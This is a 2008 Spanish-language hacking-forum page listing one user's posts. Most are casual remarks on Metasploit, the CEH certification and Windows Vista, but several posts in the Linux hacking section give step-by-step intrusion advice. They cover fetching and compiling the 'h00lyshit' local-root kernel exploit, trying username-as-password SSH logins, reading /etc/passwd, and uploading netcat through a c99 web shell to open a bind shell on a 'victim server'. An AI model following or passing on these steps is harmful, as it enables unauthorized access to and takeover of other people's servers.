elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
13 Octubre 2008, 17:59  



  Mostrar Mensajes
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ... 25
76  Seguridad Informática / Hacking Linux/Unix / Re: Escala de privilegios kernel 2.4.31 en: 29 Agosto 2008, 15:37
Ha ya veo, el Data Cha0s es un simple SPAWN shell donde te permitira abrir un puerto y tener una shell normal, ejecutalo y cambiale el puerto de escucha, conectate a este nuevo puerto, busca un directorio "escribible" para que puedas poner uno de los tantos exploits para el kernel .eg.

Buscando directorios "escribibles"

Código:
$find / -perm -2 -ls

Generalmente el /tmp tiene permisos de escritura, ahora busca el codigo llamado "h00lyshit.c" por google o alguna de tantas paginas que lo hospeda y descargalo:

Código:
$ wget http://google/h00lyshit.c

Compila el exploit

Código:
$gcc h00lyshit.c -o h00lyshit

Ejecuta ahora el binario que te creeo:

Código:
$./h00lyshit /tmp/archivogrande

Si todo marcha bien seras root, si no fue asi tendras que buscar mas vulnerabilidades LOCALES en el servidor para lograr el root o seguramente esta algo parchado.

-berz3k.






77  Programación / Scripting / Re: mensajero por red con wbat en: 29 Agosto 2008, 15:22
La page que posteas existen algunas tools interesantes para dejar de forma desatendida mediante barch algunos programs, muy buen link.

-berz3k.
78  Seguridad Informática / Hacking Linux/Unix / Re: Escalando privilegios en linux en: 29 Agosto 2008, 15:20
Si ya tienes los users, intenta loguearte con el user y mismo pass

Código:
ssh -l <usuario> ip.ip.ip.ip
password: <usuario>

Otro camino como lo mencioaba es que subas el netcat con el mismo c99, tiene la opcion de subir archivos remotamente. despues lo ejecutas por ponerlo en modo escucha en el servidor victima:

Código:
nc -n -l -v -p 11457

si todo resulta bien, desde tu PC haras un simple

telnet ip.ip.ip.ip 11457

tendras un prompt o shell asi

Código:
$ id

-berz3k.

79  Seguridad Informática / Bugs y Exploits / Re: SE pueden agregar mas exploits al metasploit 3.1 en: 29 Agosto 2008, 15:03
@Zipp0 es una pregunta muy basica, para utilizar Metasploit Framework, antes lograste encontrar alguna vulnerabilidad, aunque no necesariamente, el GUI de Metasploit ya trae muchas tools incluidas para realizar alguna tipo de scanneo "ports scan" "backshell" "shellcodes", etc, data una vuelta por la pagina de Metasploit y leete un poco el manual.

-berz3k.

80  Forums Generales / Foro Libre / Re: Definicion de Friki. Os considerais Frikis? en: 28 Agosto 2008, 13:50
I am friki-hack-geek

-berz3k.
81  Forums Generales / Noticias / Re: Descubren el mayor fallo de seguridad de internet conocido hasta el momento en: 28 Agosto 2008, 13:49
La charla se llamo

Stealing The Internet - A Routed, Wide-area, Man in the Middle Attack

pero no ubico el PDF

-berzk3.

82  Sistemas Operativos / Windows / Re: Consigue que Windows Vista sea más cómodo, rápido y... mejor en: 28 Agosto 2008, 13:22
Espero se mejore en Vista Ultamte. que el Vista Home s0x, por ello voy a reinstalar

-berz3k.

83  Seguridad Informática / Hacking Linux/Unix / Re: Escalando privilegios en linux en: 28 Agosto 2008, 13:08
Intenta conocer los users que tiene accesos remoto ya sea por telnet o ssh. es decir:

1. Observa el archivo /etc/passwd, intenta loguearte con alguno de ellos
2. Sube un netcat y ejecunta algun backshell o portbind

nc -lp 8080

3. Subre un shell.php o algo similar , el propio c99 te da la opcion de ejecutar comandos.

4. Buscan los exploits de Cpanel en milw0rm.com

-berz3k.

84  Seguridad Informática / Hacking Avanzado / Re: Certificacion CEH (Certified Ethical Hacker) en: 28 Agosto 2008, 13:02

Si eres de la gente de "corbata" y te interesa tomar esta certificacion, aprendela de memoria y olvidate del mundillo, pero; si eres de la gente que desea aprender y conocer mas del mundillo estudiala paso a paso, Labs , practicas etc, toma tu tiempo y sobre todo plantea tus dudas.

-berz3k.
 
85  Seguridad Informática / Hacking Avanzado / Re: Documental Video Hacking en: 28 Agosto 2008, 12:53
El documental esta perfecto no conocia los grupos de ataque que el GOV de USA estaba organizando para testear sus propias vulnerabilidades.

-berz3k.

86  Seguridad Informática / Bugs y Exploits / Re: BugS en TCW710? en: 28 Agosto 2008, 11:55

Yo no he tenino la oportidad de probar el c0de sobre el equipo, el c0de lo hice a "ciegas", pero estoy seguro es bastante funcional, yo espero me presten uno pronto para probar.

-berz3k.

87  Seguridad Informática / Bugs y Exploits / Re: SE pueden agregar mas exploits al metasploit 3.1 en: 28 Agosto 2008, 11:51
Se pueden agregar mas exploits, cuando te bajas la ultima version de Metasploit Framework y realizas un "Online Update" tendras lo ultimo en exploits, obviamente algunos codes no los agregan como "oficiales" de Metasploit, para ello tendras que agregarlos manualmente y/o programarlos.

-berz3k.



88  Seguridad Informática / Hacking Linux/Unix / Re: Hacker Linux Uncovered en: 28 Agosto 2008, 11:27
Algo viejito, pero para iniciar en el mundillo bastante bueno para los novatos.

-berz3k.

Código:
# Paperback: 500 pages
# Publisher: A-List Publishing (November 1, 2005)
89  Seguridad Informática / Hacking Linux/Unix / Re: Escala de privilegios kernel 2.4.31 en: 27 Agosto 2008, 09:54
No conozco el Data Cha0s subelo algun link para analizarlo, mencioname mas datos como su instalacion, etc etc.

-berz3k.

90  Seguridad Informática / Bugs y Exploits / Re: ¿Dónde puedo descargar el Metasploit 3.2? en: 27 Agosto 2008, 08:36

En la lista de desarrolo de Metasploit framework te daran mas data.

-berz3k.

Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ... 25






Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC